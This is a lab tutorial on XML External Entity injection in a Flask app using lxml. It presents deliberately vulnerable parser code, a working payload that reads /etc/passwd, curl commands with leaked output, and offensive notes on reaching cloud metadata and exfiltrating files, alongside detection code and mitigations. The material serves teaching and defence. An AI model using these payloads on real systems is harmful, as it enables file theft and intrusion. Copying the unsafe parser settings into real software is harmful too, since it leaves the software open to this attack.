PyFu

XML External Entity (XXE) Injection in Flask Application

In this section, we will explore how a simple Flask application can become vulnerable to XML External Entity (XXE) attacks when improperly handling XML input using the lxml parser.

See Python LXML Insecure XML Parsing for more on the vulnerable lxml code patterns.

To see how XXE surfaces in a Flask application, consider the following application, which simulates a configuration upload feature where users upload XML-based configuration files for cloud providers.

However, due to unsafe parser options, the application resolves external entities, which attackers can exploit to read internal files or other sensitive data.

from flask import Flask, request, jsonify
from lxml import etree

app = Flask(__name__)

@app.route('/upload_config', methods=['POST'])
def upload_config():
    xml_data = request.data

    parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
    try:
        root = etree.fromstring(xml_data, parser)

        cloud_name = root.findtext('cloud')
        access_key = root.findtext('access_key')
        secret_key = root.findtext('secret_key')
        ecs_cluster_arn = root.findtext('ecs_cluster_arn')
        ecs_cluster_role = root.findtext('ecs_cluster_role')
        region = root.findtext('region')

        return jsonify({
            'cloud': cloud_name,
            'access_key': access_key,
            'secret_key': secret_key,
            'ecs_cluster_arn': ecs_cluster_arn,
            'ecs_cluster_role': ecs_cluster_role,
            'region': region
        })

    except etree.XMLSyntaxError as e:
        return jsonify({'error': str(e)}), 400

In this application, the user submits an XML document containing AWS credentials and ECS cluster details.

Flask receives the incoming HTTP request, and the raw request body is read from request.data, which holds the full request payload as bytes.

Since the client sends the XML content directly in the body, Flask stores it as-is without any automatic parsing or decoding. The application then assigns this raw XML payload to xml_data for further processing:

xml_data = request.data

Next, the application initializes an XML parser using lxml.etree with the options load_dtd=True and resolve_entities=True, which explicitly enable DTD loading and entity resolution, including external entities:

parser = etree.XMLParser(load_dtd=True, resolve_entities=True)

Once the parser is configured, the application uses the fromstring function to parse the incoming XML data using this parser:

root = etree.fromstring(xml_data, parser)

These two options leave the parser vulnerable to XXE attacks: a user can submit a malicious XML file whose external entities make the parser read sensitive data.

To exploit this issue, we will craft a malicious XML payload that defines an external entity referencing the local file /etc/passwd.

This entity is then injected into one of the XML elements, for example, inside the <secret_key> field.

The payload structure looks like:

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<config>
    <cloud>AWS</cloud>
    <access_key>AKIA123456</access_key>
    <secret_key>&xxe;</secret_key>
    <ecs_cluster_arn>arn:aws:ecs:us-west-1:1234567890:cluster/MyCluster</ecs_cluster_arn>
    <ecs_cluster_role>arn:aws:iam::1234567890:role/ecsServiceRole</ecs_cluster_role>
    <region>us-west-1</region>
</config>

Once this payload is submitted to the vulnerable /upload_config endpoint, the parser processes the entity and replaces &xxe; with the actual file content from /etc/passwd.

As a result, the HTTP response will return the leaked file content inside the secret_key field of the JSON response.

We can use the following curl command to send payload.xml to the vulnerable endpoint:

 curl -X POST http://127.0.0.1:5000/upload_config --data-binary @payload.xml -H "Content-Type: application/xml"

This returns the following response, which shows that we successfully read the contents of /etc/passwd:

:: PyFu/flask-fu/flask-xxe » curl -X POST http://127.0.0.1:5000/upload_config --data-binary @payload.xml -H "Content-Type: application/xml"

{
  "access_key": "AKIA123456",
  "cloud": "AWS",
  "ecs_cluster_arn": "arn:aws:ecs:us-west-1:1234567890:cluster/MyCluster",
  "ecs_cluster_role": "arn:aws:iam::1234567890:role/ecsServiceRole",
  "region": "us-west-1",
  "secret_key": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man
  ...
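The same request can also be sent from Python. The following is a minimal sketch using only the standard library; build_upload_request and send_upload are hypothetical helper names introduced here for illustration, and the URL is the local lab address used in the curl command above.

```python
import json
import urllib.request


def build_upload_request(url: str, payload: bytes) -> urllib.request.Request:
    """Build a POST request carrying raw XML, mirroring curl --data-binary."""
    return urllib.request.Request(
        url,
        data=payload,  # sent as-is, so Flask sees it in request.data
        method="POST",
        headers={"Content-Type": "application/xml"},
    )


def send_upload(request: urllib.request.Request) -> dict:
    """Send the request and decode the JSON body returned by the endpoint."""
    # Note: urlopen raises urllib.error.HTTPError for 4xx/5xx responses,
    # for example the 400 the lab app returns for malformed XML.
    with urllib.request.urlopen(request, timeout=5) as response:
        return json.loads(response.read().decode("utf-8"))
```

With the lab running, reading payload.xml as bytes, passing it to build_upload_request("http://127.0.0.1:5000/upload_config", payload), and handing the result to send_upload should yield the same JSON fields that curl prints.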

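How lxml behaves without these flags depends on the version. Per the lxml documentation, resolve_entities defaults to 'internal' since lxml 5.0, so only entities defined inside the document are expanded and external files or URLs are not accessed unless the option is explicitly set to True.

Older releases defaulted to resolve_entities=True, so a file:// entity could be resolved even without manually setting these flags; only network access was blocked by the no_network=True default. On any version, setting resolve_entities=False explicitly is the safest choice for untrusted input.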
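One way to check how a given parser configuration behaves on the installed lxml version is to point an entity at a throwaway file and see whether its contents come back. The sketch below assumes lxml is installed; parser_leaks_file and the canary string are hypothetical names introduced for illustration, not part of the lab.

```python
import tempfile
from pathlib import Path

from lxml import etree

MARKER = "XXE-CANARY-7f3a"  # hypothetical canary value, not a real secret


def parser_leaks_file(parser: etree.XMLParser) -> bool:
    """Return True if `parser` inlines a local file through an external entity."""
    with tempfile.TemporaryDirectory() as tmp:
        canary = Path(tmp) / "canary.txt"
        canary.write_text(MARKER, encoding="utf-8")
        # Same shape as the lab payload, but aimed at the harmless canary file.
        payload = (
            '<?xml version="1.0"?>\n'
            f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "{canary.as_uri()}">]>\n'
            "<config><secret_key>&xxe;</secret_key></config>"
        ).encode("utf-8")
        try:
            root = etree.fromstring(payload, parser)
        except etree.XMLSyntaxError:
            # The parser rejected the document outright, so nothing leaked.
            return False
        return MARKER in (root.findtext("secret_key") or "")
```

Passing etree.XMLParser(load_dtd=True, resolve_entities=True) exercises the lab's configuration, while etree.XMLParser(resolve_entities=False) exercises a hardened one; comparing the two results on a given installation shows whether the flags matter there.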

Why XXE matters from an offensive security perspective

XXE is the finding I reach for whenever an endpoint parses attacker-supplied XML, because a single external entity turns a config-upload or document-import feature into arbitrary file read. On this lab it leaks /etc/passwd into the response, but in practice I am after application source, framework config, cloud credential files, and SSH keys, all by pointing an entity at a file:// path. XXE is rarely just file read either: it is server-side request forgery in disguise. When the parser is allowed network access (no_network=False in lxml), a SYSTEM "http://169.254.169.254/..." entity reaches cloud metadata and internal services, and parameter or blind out-of-band entities exfiltrate files I cannot see in the response. Python makes this common because lxml is one of the most widely used XML libraries and developers flip resolve_entities and load_dtd on without understanding the blast radius.

These are the tells I look for in an assessment:

  • etree.XMLParser(load_dtd=True, resolve_entities=True) or no_network=False. These flags re-enable the dangerous behaviour that current lxml releases disable by default; I grep for them first.
  • Any endpoint consuming request.data as XML. Config uploads, SAML, SOAP, RSS/Atom ingestion, SVG and DOCX/XLSX processing, and sitemap parsers are all XML sinks.
  • Reflected parsed fields. When the app echoes parsed values back, &xxe; in a returned element gives me direct file read; when it does not, I go blind with out-of-band entities.
  • Custom parser construction. Hand-rolled XMLParser(...) is the smell: because the defaults are comparatively safe, a custom parser usually means someone deliberately turned the protections off.
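The first tell in the list above can be checked mechanically rather than with a plain grep. The following is a rough sketch using Python's ast module; find_risky_xmlparser_calls and RISKY_KEYWORDS are hypothetical names introduced here, and the check only catches literal True/False keyword arguments on calls named XMLParser, so it will miss flags passed through variables or **kwargs.

```python
import ast

# Keyword arguments that weaken the parser when set to these literal values.
RISKY_KEYWORDS = {"load_dtd": True, "resolve_entities": True, "no_network": False}


def find_risky_xmlparser_calls(source: str) -> list[tuple[int, str]]:
    """Return sorted (line number, keyword) pairs for risky XMLParser(...) calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Match both etree.XMLParser(...) and a bare XMLParser(...).
        if isinstance(func, ast.Attribute):
            name = func.attr
        else:
            name = getattr(func, "id", None)
        if name != "XMLParser":
            continue
        for keyword in node.keywords:
            if (
                keyword.arg in RISKY_KEYWORDS
                and isinstance(keyword.value, ast.Constant)
                and keyword.value.value is RISKY_KEYWORDS[keyword.arg]
            ):
                findings.append((node.lineno, keyword.arg))
    return sorted(findings)
```

Running it over the source of the lab application should flag the line that constructs the parser with load_dtd=True and resolve_entities=True.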

The defender takeaway: keep DTD loading and external-entity resolution disabled (the default in lxml 5.0 and later), parse untrusted XML with defusedxml, and reject DOCTYPE where the format does not need it.

Proof of exploitation

Run the lab app (PyFuLabs/flask-fu/flask-xxe) and POST an XML document whose external entity points at /etc/passwd (the malicious payload.xml ships with the lab):

curl -s -X POST "http://pyfu.local/flask-fu/flask-xxe/upload_config" \
  --data-binary @payload.xml -H "Content-Type: application/xml"
{
  "access_key": "AKIA123456",
  "cloud": "AWS",
  "secret_key": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n..."
}

The parser resolved &xxe; and inlined the file’s contents into the secret_key field of the response.

Mitigation

The fix is to disable DTD loading and external-entity resolution, which is the default in lxml 5.0 and later; the vulnerability here comes from explicitly constructing XMLParser(load_dtd=True, resolve_entities=True), so those flags, along with no_network=False, must never be set for attacker-supplied XML. Parse untrusted documents with defusedxml for defense in depth, reject DOCTYPE declarations outright where the format does not need them, and validate the result against a schema rather than trusting whatever entities the document declares.
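As an illustration of the first two points, the parsing step of upload_config could be replaced by something like the sketch below. It assumes lxml is installed; make_hardened_parser, parse_untrusted_config, and FIELDS are hypothetical names introduced here, and the sketch covers neither defusedxml nor schema validation.

```python
from lxml import etree

# The fields the lab endpoint reads from the uploaded document.
FIELDS = (
    "cloud", "access_key", "secret_key",
    "ecs_cluster_arn", "ecs_cluster_role", "region",
)


def make_hardened_parser() -> etree.XMLParser:
    """Build a parser that never expands entities or fetches DTDs."""
    return etree.XMLParser(
        resolve_entities=False,  # leave entity references unexpanded
        load_dtd=False,          # do not load external DTDs
        no_network=True,         # block network lookups
    )


def parse_untrusted_config(xml_bytes: bytes) -> dict:
    """Parse a config upload, rejecting malformed XML and any DOCTYPE."""
    try:
        root = etree.fromstring(xml_bytes, make_hardened_parser())
    except etree.XMLSyntaxError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc
    # This config format has no need for a DTD, so refuse documents that
    # declare one instead of trying to sanitise them.
    if root.getroottree().docinfo.internalDTD is not None:
        raise ValueError("DOCTYPE declarations are not accepted")
    return {name: root.findtext(name) for name in FIELDS}
```

In the Flask view, a ValueError from this function would map naturally to the existing 400 response. Rejecting the DOCTYPE after a hardened parse, rather than searching the raw bytes for "<!DOCTYPE", avoids being fooled by alternative encodings of the document.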